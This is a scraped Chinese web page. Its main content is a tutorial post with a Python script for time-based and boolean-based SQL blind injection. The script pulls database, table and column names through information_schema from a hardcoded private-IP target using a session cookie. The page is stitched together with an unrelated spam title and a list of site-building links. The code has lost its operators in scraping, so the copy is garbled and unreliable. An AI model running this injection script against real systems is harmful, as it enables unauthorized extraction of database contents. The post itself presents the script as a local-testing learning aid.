当前位置: 首页 > news >正文

天河做网站注册网站的免费网址com

news 2026/4/17 18:53:01
天河做网站,注册网站的免费网址com,常见的网络营销方法,启动 wordpress 博客python 实现盲注 该python脚本根据之前介绍的盲注原理实现, 对于发送的注入请求没有做等待间隔, 可能给目标服务器造成一定 压力, 所以仅限于本地测试使用. import requests, time# 时间型盲注 def time_blind(base_url, cookie):for length in range(1, 20): # 测试数据库名…python 实现盲注 该python脚本根据之前介绍的盲注原理实现, 对于发送的注入请求没有做等待间隔, 可能给目标服务器造成一定 压力, 所以仅限于本地测试使用. import requests, time# 时间型盲注 def time_blind(base_url, cookie):for length in range(1, 20): # 测试数据库名长度 1~19start time.time()header {Cookie: cookie}url f{base_url} and if(length(database()){length}, sleep(3.5), 1)_ requests.get(urlurl, headersheader)end time.time()resptime end-startif int(resptime) 3:print(数据库长度为:, length)breakelse:print(url)# 布尔型盲注爆列名 def bool_blind(base_url, cookie):chars abcdefghijklmnopqrstuvwxyz0123456789_,session requests.session()base_url base_urlheader {Cookie: cookie}# 先定义猜对的时候的长度resp session.get(urlbase_url and 11, headersheader)base_len len(resp.text)# 先获取数据库长度for db_len in range(1, 20):url f{base_url} and length(database()){db_len}resp session.get(urlurl, headersheader)if len(resp.text) base_len:breakprint(f数据库长度{db_len})# 根据数据库长度猜名称db_name for i in range(1, db_len1):for c in chars:url f{base_url} and substr(database(), {i}, 1){c}resp session.get(urlurl, headersheader)if len(resp.text) base_len:db_name cbreakprint(f数据库名{db_name})# 根据数据库名称猜表名table_name for i in range(1, 40):for c in chars:sql fselect group_concat(table_name) from information_schema.tables where table_schema{db_name}url f{base_url} and substr(({sql}), {i}, 1){c}resp session.get(urlurl, headersheader)if len(resp.text) base_len:table_name cbreakprint(f数据库中的表名{table_name})# 猜所有表的列名table_list table_name.strip().split(,)for table in table_list:column_name for i in range(100):for c in chars:sql fselect group_concat(column_name) from information_schema.columns where table_schema{db_name} and table_name{table}url f{base_url} and substr(({sql}), {i}, 1){c}resp session.get(urlurl, headersheader)if len(resp.text) base_len:column_name cbreakprint(f表{table}的列名{column_name})if __name__ __main__:url http://192.168.112.200/security/read.php?id1cookie PHPSESSIDb4d659be5e17d948fd8e18078003d3f6time_blind(base_urlurl, cookiecookie)# bool_blind(base_urlurl, cookiecookie)
http://www.hkea.cn/news/14304691/

相关文章:

  • 网站建设的提升网站建设的规划方案
  • 平台网站建设协议网络营销运营外包
  • 网站建设行业2017长春网站制作
  • 网站运营代理网站建设方案浩森宇特
  • 网上书城网站开发的结论和不足深圳市住房和建设局投诉电话
  • 天津网站建设网页设计公司天津企业建站系统
  • 驻马店做网站的公司现在做外贸前景如何
  • 国外网站网址建c2c网站费用
  • 河南炒股配资网站开发陕西网站建设价格
  • 中国建设银行网站是什么网站的footer怎么做
  • 南昌做网站的公司哪里好土巴兔装修平台电话
  • ic商城网站建设设计说明英文翻译
  • 网站建设在哪里找客户做平台好还是做网站好
  • 做的网站有广告哪个网站上做ppt比较好看的
  • 长沙做网站公司 上联网络国际展览中心有什么展览
  • 制作校园网站惠城区城乡规划建设局网站
  • 网站的总体架构wordpress 清理
  • 外贸网站建设科技最近国际重大新闻
  • 下载cmsv7爱站工具seo综合查询
  • asp装饰公司网站源码电商网站 费用
  • .net做中英文网站网站开发与设计教程
  • 网站开发毕业设计书中国建设工程监理协会网站
  • 关于景区网站规划建设方案书应用市场免费下载安装
  • 网站相关前置许可网站规划文字说明
  • 手机网站技巧济南网络科技有限公司有哪些
  • 网站首页分辨率怎样加入好大夫网站做医生
  • 聊城市建设工程质量监督站网站芜湖公司网站建设
  • 电台网站建设要求专业网站设计学校
  • 南沙做网站要多少钱wordpress 主题 mip
  • 做家居建材出口网站有哪些企业展厅设计网